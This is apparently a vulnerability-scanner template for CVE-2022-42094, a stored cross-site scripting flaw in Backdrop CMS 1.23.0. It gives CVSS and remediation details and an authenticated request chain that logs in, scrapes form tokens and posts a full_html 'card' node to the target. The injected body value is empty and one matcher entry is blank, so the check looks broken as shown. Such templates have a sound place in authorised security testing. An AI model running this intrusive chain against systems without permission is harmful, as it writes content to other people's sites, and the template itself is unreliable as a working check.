id: CVE-2022-42094 info: name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting author: theamanrawat severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42094 - https://nvd.nist.gov/vuln/detail/CVE-2022-42094 - https://backdropcms.org classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 epss-score: 0.00604 epss-percentile: 0.76158 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: backdropcms product: backdrop tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive http: - raw: - | GET /?q=user/login HTTP/1.1 Host: {{Hostname}} - | POST /?q=user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in - | GET /?q=node/add/card HTTP/1.1 Host: {{Hostname}} - | POST /?q=node/add/card HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="title" {{randstr}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="files[field_image_und_0]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="field_image[und][0][fid]" 0 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="field_image[und][0][display]" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="changed" ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="form_build_id" {{form_id_2}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="form_token" {{form_token}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="form_id" card_node_form ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="body[und][0][value]" ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="body[und][0][format]" full_html ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="name" {{name}} ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="date[date]" 2023-04-13 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="date[time]" 21:49:36 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="path[auto]" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="comment" 1 ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="additional_settings__active_tab" ------WebKitFormBoundaryWEcZgRB4detkrGaY Content-Disposition: form-data; name="op" Save ------WebKitFormBoundaryWEcZgRB4detkrGaY-- cookie-reuse: true host-redirects: true matchers-condition: and matchers: - type: word part: body words: - - Backdrop CMS condition: and - type: status status: - 200 extractors: - type: regex name: form_id_1 group: 1 regex: - name="form_build_id" value="(.*)" internal: true - type: regex name: name group: 1 regex: - name="name" value="(.*?)" internal: true - type: regex name: form_id_2 group: 1 regex: - name="form_build_id" value="(.*)" internal: true - type: regex name: form_token group: 1 regex: - name="form_token" value="(.*)" internal: true # digest: 4b0a00483046022100c94a83e3836b67d38385825caef9c5056ac6c45326ab1fa32835451e15ab5755022100e758062e5e2fb7cc7503b8c403b8a8dacb7f933e122b6129fed0d528917c2a75:922c64590222798bb761d5b6d8e72950